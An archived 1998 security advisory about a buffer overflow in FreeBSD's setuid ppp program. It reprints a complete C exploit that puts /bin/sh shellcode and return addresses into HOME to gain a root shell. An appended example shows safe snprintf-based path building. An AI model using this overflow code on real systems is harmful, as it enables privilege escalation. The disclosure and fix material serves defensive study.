11th Mar 1998 [SBWID-183]
COMMAND
	    /usr/sbin/ppp
SYSTEMS AFFECTED
	    FreeBSD
PROBLEM
	    Nirva wrote an exploit for ppp on FreeBSD systems. This
	    vulnerability has nothing to do with FreeBSD-SA-96:16. Note,
	    however, that this is an old one (dated 1996).
	
	    /*
	     * Mess with the numbers if it doesn't work.
	     *
	     *      --Nirva 8/4/96
	     */
	    #include <stdio.h>
	    #include <stdlib.h>
	    #include <string.h>     /* strlen, memset */
	    #include <unistd.h>
	    #define BUFFER_SIZE     156     /* size of the buffer to overflow */
	    #define OFFSET          -290    /* number of bytes to jump after the start
					       of the buffer */
	    long get_esp(void) { __asm__("movl %esp,%eax\n"); }
	    main(int argc, char *argv[])
	    {
		    char *buf = NULL;
		    unsigned long *addr_ptr = NULL;
		    char *ptr = NULL;
		    char execshell[] =
		    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
		    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
		    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
		    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
		    int i,j;
		    buf = malloc(4096);
		    /* fill start of buffer with nops */
		    i = BUFFER_SIZE-strlen(execshell);
		    memset(buf, 0x90, i);
		    ptr = buf + i;
		    /* place exploit code into the buffer */
		    for(i = 0; i < strlen(execshell); i++)
			    *ptr++ = execshell[i];
		    addr_ptr = (long *)ptr;
		    for(i=0;i < (104/4); i++)
			    *addr_ptr++ = get_esp() + OFFSET;
		    ptr = (char *)addr_ptr;
		    *ptr = 0;
		    setenv("HOME", buf, 1);
		    execl("/usr/sbin/ppp", "ppp", NULL);
	    }
	
SOLUTION
	    This vulnerability was fixed some time ago. I don't know the
	    exact version, but the FreeBSD versions currently available are
	    safe for sure.
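
The exploit above works by placing an oversized string in HOME before running the setuid binary. As an added example (not code from ppp or from the original advisory), this is one way a privileged program can build a path from HOME with a length check and truncation detection; the function name build_rc_path and the file name ".examplerc" are hypothetical, and the 156-byte buffer is a constructed size borrowed from BUFFER_SIZE in the exploit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RC_NAME ".examplerc"   /* hypothetical file name, not ppp's own */

/*
 * Build "<home>/<RC_NAME>" in out, which holds outlen bytes.
 * Returns 0 on success, -1 if HOME is missing, not absolute, or the
 * result would not fit. Nothing is written past out[outlen - 1].
 */
int build_rc_path(const char *home, char *out, size_t outlen)
{
    int n;

    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    if (home[0] != '/')                  /* accept absolute paths only */
        return -1;

    /* snprintf never writes more than outlen bytes and reports the
       length it needed, so truncation can be detected and refused. */
    n = snprintf(out, outlen, "%s/%s", home, RC_NAME);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';                   /* leave no partial path behind */
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[156];   /* constructed size, same as BUFFER_SIZE above */
    const char *home = getenv("HOME");   /* attacker-controlled input */

    if (build_rc_path(home, path, sizeof path) != 0) {
        fprintf(stderr, "HOME unset, relative, or too long; ignoring\n");
        return 1;
    }
    printf("rc file: %s\n", path);
    return 0;
}
```
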
	
